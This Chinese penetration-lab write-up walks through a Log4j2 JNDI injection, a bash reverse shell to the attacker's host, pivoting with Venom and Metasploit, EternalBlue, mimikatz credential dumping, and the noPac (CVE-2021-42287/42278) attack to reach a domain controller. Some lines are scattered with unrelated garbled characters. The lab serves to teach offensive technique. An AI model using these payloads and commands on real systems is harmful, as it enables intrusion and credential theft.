前言
記一次log4j2打入內(nèi)網(wǎng)并用CVE-2021-42287绘雁、CVE-2021-42278獲取到DC權限的靶場滲透铝噩。
外網(wǎng)打點
首先對web進行端口掃描,發(fā)現(xiàn)38080端口和22端口
訪問一下38080端口發(fā)現(xiàn)是一個error page
用Wappalyzer看一下是什么架構(gòu)鳖目,但是好像沒有檢測出來
拿著報錯去百度上發(fā)現(xiàn)應該是springboot
索性用goby再去掃一下仪媒,應該是spring沒錯狸眼,但是沒有漏洞是什么操作藤树?聯(lián)想到最近出的log4j2的洞,可能他只是一個日志文件所以并沒有框架
使用payload=${jndi:ldap://p9j8l8.dnslog.cn}
驗證一下有回顯證明存在漏洞
嘗試進一步利用漏洞拓萌,首先起一個ldap服務岁钓,ip為本地接收shell的ip地址
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105</pre>
抓包修改Content-Type: appllication/x-www-form-urlencoded
,并執(zhí)行以下payload成功回顯
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}</pre>
執(zhí)行ls -al /
看一下也成功
nc開啟監(jiān)聽端口
然后使用bash命令反彈,這里需要先base64編碼然后對編碼后的特殊字符進行2層url轉(zhuǎn)碼
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bash -i >& /dev/tcp/192.168.1.105/9999 0>&1</pre>
抓包添加payload=${jndi:ldap:1/192.168.1.105:1389/TomcatBypass/Command/Base64/二層轉(zhuǎn)碼之后的字符}
屡限,即可得到反彈shell
進行信息搜集發(fā)現(xiàn)為docker環(huán)境品嚣,這里嘗試了docker逃逸失敗,那么繼續(xù)進行信息搜集
在根目錄下找到了第一個flag钧大,這里有一個got this
翰撑,在之前端口掃描的時候看到開放了22端口,嘗試使用ssh直接連接
使用xshell嘗試連接
連接成功啊央,拿到了宿主機的權限
ifconfig查看網(wǎng)卡情況發(fā)現(xiàn)還有一張10.0.1.0/24段的網(wǎng)卡
這里方便的話其實可以使用cs上線linux后用cs繼續(xù)打眶诈,這里我就沒有上線cs,使用linux的命令對10.0.1.0/24段探測存貨主機
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"> for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 i Find the target; fi; done</pre>
ping一下是存活的
使用毒液把流量代理出來瓜饥,首先開啟監(jiān)聽
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">admin.exe -lport 7777</pre>
然后上傳agent_linux到靶機上
加權并執(zhí)行
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777</pre>
連接成功
這里本來準備用毒液的代理到msf打的册养,后面覺得比較麻煩,就直接用kali生成的elf馬上線msf了
首先生成一個32位的elf馬
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf</pre>
然后加權并執(zhí)行
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">chmod 777 shell.elf
./shell</pre>
kali使用exploit/multi/handler
進行監(jiān)聽
獲取到宿主機的shell
然后添加10.0.1.0/24段的路由
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bg
route add 10.0.1.0 255.255.255.0 1
route print</pre>
然后配置proxychain4.conf
文件并使用socks模塊
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">search socks
use auxiliary/sevrer/socks_proxy
run</pre>
我們在之前已經(jīng)知道了內(nèi)網(wǎng)主機的ip压固,那么這里我們直接使用proxychain配合nmap對10.0.1.7的端口進行掃描
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains4 nmap -sT -Pn 10.0.1.7</pre>
發(fā)現(xiàn)有445端口,那么對445端口進一步掃描
先確定一下系統(tǒng)版本靠闭,使用auxiliary/scanner/smb/smb_version
模塊帐我,發(fā)現(xiàn)是win7 sp1
看能不能利用永恒之藍,這里使用到auxiliary/scanner/smb/smb_ms17_010
模塊愧膀,發(fā)現(xiàn)可以利用永恒之藍
使用exploit/windows/smb/ms17_010_eternalbule
模塊拦键,因為是不出網(wǎng)環(huán)境,這里需要用到bind_tcp
載荷
run之后拿到一個system權限的meterpreter
在C:\Users\root\Desktop
下拿到第二個flag
然后繼續(xù)進行信息搜集檩淋,發(fā)現(xiàn)同樣是雙網(wǎng)卡芬为,還存在10.0.0.0/24段的一張網(wǎng)卡
ipconfig /all看到dns服務器為redteam.lab
應該在域內(nèi)
這里ping一下redteam.lab
得到域控的ip為10.0.0.12
這里不知道域控有什么洞,先上傳一個mimikatz把密碼抓取出來蟀悦,得到Administrator/Admin12345
媚朦,這里其實就可以使用域管賬戶ipc直接連接,但是這里抓到了一個域用戶日戈,嘗試使用最新的CVE-2021-42287询张、CVE-2021-42278來進行攻擊,關于漏洞的原理請移步
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">privilege::debug
sekurlsa::logonpasswords</pre>
這里我準備使用noPac.exe直接去獲取一個shell的浙炼,但是這里noPac.exe的利用條件是需要主機上有.net4.0環(huán)境份氧,所以這里沒有回顯
noPac.exe下載地址:https://github.com/cube0x0/noPac
本來準備一步一步的用原始的方法打的,但是powershell用不了沒有回顯弯屈,就寫一下原始利用的步驟吧
- 首先創(chuàng)建一個機器賬戶蜗帜,可以使用 impacket 的
addcomputer.py
或是powermad
`addcomputer.py`是利用`SAMR協(xié)議`創(chuàng)建機器賬戶,這個方法所創(chuàng)建的機器賬戶沒有SPN资厉,所以可以不用清除
- 清除機器賬戶的
servicePrincipalName
屬性
- 將機器賬戶的
sAMAccountName
厅缺,更改為DC的機器賬戶名字,注意后綴不帶$
- 為機器賬戶請求TGT
- 將機器賬戶的
sAMAccountName
更改為其他名字,不與步驟3重復即可
- 通過S4U2self協(xié)議向DC請求ST
- 進行 DCsync Attack
這里直接使用sam_the_admin.py進行攻擊
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell</pre>
即可拿到DC的shell
在C:\Users\Administrator\Desktop
下找到最后一個flag